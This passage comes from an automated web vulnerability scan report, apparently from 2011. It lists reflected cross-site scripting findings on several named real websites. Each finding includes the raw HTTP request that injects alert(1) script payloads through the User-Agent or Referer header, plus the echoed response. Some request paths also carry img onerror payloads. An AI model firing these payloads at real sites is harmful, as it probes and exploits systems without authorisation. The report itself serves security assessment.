Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c1fb5--><script>alert(1)</script>c5cfd3457d7
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=2d929a81ff6dd6043acb9a8a066a94f8; path=/
Last-Modified: Tue, 25 Jan 2011 00:09:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43543

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<!-- your browser is :Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c1fb5--><script>alert(1)</script>c5cfd3457d7 -->
...[SNIP]...

4.1972. http://www.rochenhost.com/joomla-hosting [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /joomla-hosting

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload d56e4--><script>alert(1)</script>24eb3536c59 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d56e4--><script>alert(1)</script>24eb3536c59
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=c61bb9f3b7102c8aba2e3fc31a0f88e8; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:31 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43179

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<!-- your browser is :Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d56e4--><script>alert(1)</script>24eb3536c59 -->
...[SNIP]...

4.1973. http://www.traderpub.com/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.traderpub.com
Path:   /x22

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ace"><script>alert(1)</script>39ae012e14a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /x22 HTTP/1.1
Host: www.traderpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=55ace"><script>alert(1)</script>39ae012e14a

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 15:15:24 GMT
Content-type: text/html
Content-length: 363
Connection: close

<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...
<A HREF="http://www.google.com/search?hl=en&q=55ace"><script>alert(1)</script>39ae012e14a">
...[SNIP]...

4.1974. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload 9879d><script>alert(1)</script>aaede211a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 9879d><script>alert(1)</script>aaede211a9

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1148
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<img, referer: 9879d><script>alert(1)</script>aaede211a9.</br>
...[SNIP]...

4.1975. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 20e7e<script>alert(1)</script>086eb857f86 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=20e7e<script>alert(1)</script>086eb857f86

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1296
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
</script>086eb857f86">http://www.google.com/search?hl=en&q=20e7e<script>alert(1)</script>086eb857f86</a>
...[SNIP]...

4.1976. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3f4c3><script>alert(1)</script>e8ade6fb151 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3f4c3><script>alert(1)</script>e8ade6fb151

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1300
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<img, referer: http://www.google.com/search?hl=en&q=3f4c3><script>alert(1)</script>e8ade6fb151.</br>
...[SNIP]...

4.1977. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f90"><script>alert(1)</script>9d0ccdde51c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=33f90"><script>alert(1)</script>9d0ccdde51c

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1304
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=33f90"><script>alert(1)</script>9d0ccdde51c">
...[SNIP]...

4.1978. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload ead44<script>alert(1)</script>659da71b328 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ead44<script>alert(1)</script>659da71b328
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1069
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>Please check the URL
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ead44<script>alert(1)</script>659da71b328<br>
...[SNIP]...

4.1979. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload d4e07><script>alert(1)</script>db7d3dc30c8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: d4e07><script>alert(1)</script>db7d3dc30c8

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1299
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<img src=a onerror=alert(String.fromCharCode(88,83,83, referer: d4e07><script>alert(1)</script>db7d3dc30c8.</br>
...[SNIP]...

4.1980. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e304"><script>alert(1)</script>3bc164e7716 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1e304"><script>alert(1)</script>3bc164e7716

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e304"><script>alert(1)</script>3bc164e7716">
...[SNIP]...

4.1981. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1772b<script>alert(1)</script>825d0cb184a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1772b<script>alert(1)</script>825d0cb184a

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1443
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
</script>825d0cb184a">http://www.google.com/search?hl=en&q=1772b<script>alert(1)</script>825d0cb184a</a>
...[SNIP]...

4.1982. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 72eb0><script>alert(1)</script>f372d244a89 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=72eb0><script>alert(1)</script>f372d244a89

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<img src=a onerror=alert(String.fromCharCode(88,83,83, referer: http://www.google.com/search?hl=en&q=72eb0><script>alert(1)</script>f372d244a89.</br>
...[SNIP]...

4.1983. http://www.washington.edu/alpinef972a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a9cd4<script>alert(1)</script>cf2ce7c8cab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a9cd4<script>alert(1)</script>cf2ce7c8cab
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a9cd4<script>alert(1)</script>cf2ce7c8cab<br>
...[SNIP]...

4.1984. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ef0"><script>alert(1)</script>43e8426f66e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29ef0"><script>alert(1)</script>43e8426f66e

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1501
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/</b> wa
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=29ef0"><script>alert(1)</script>43e8426f66e">
...[SNIP]...

4.1985. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 492f0<script>alert(1)</script>34eb159046a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=492f0<script>alert(1)</script>34eb159046a

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1493
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/</b> wa
...[SNIP]...
</script>34eb159046a">http://www.google.com/search?hl=en&q=492f0<script>alert(1)</script>34eb159046a</a>
...[SNIP]...

4.1986. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 2ae36<script>alert(1)</script>e3eb2d74228 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2ae36<script>alert(1)</script>e3eb2d74228
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1266
Connection: close
Content-Type: text/html

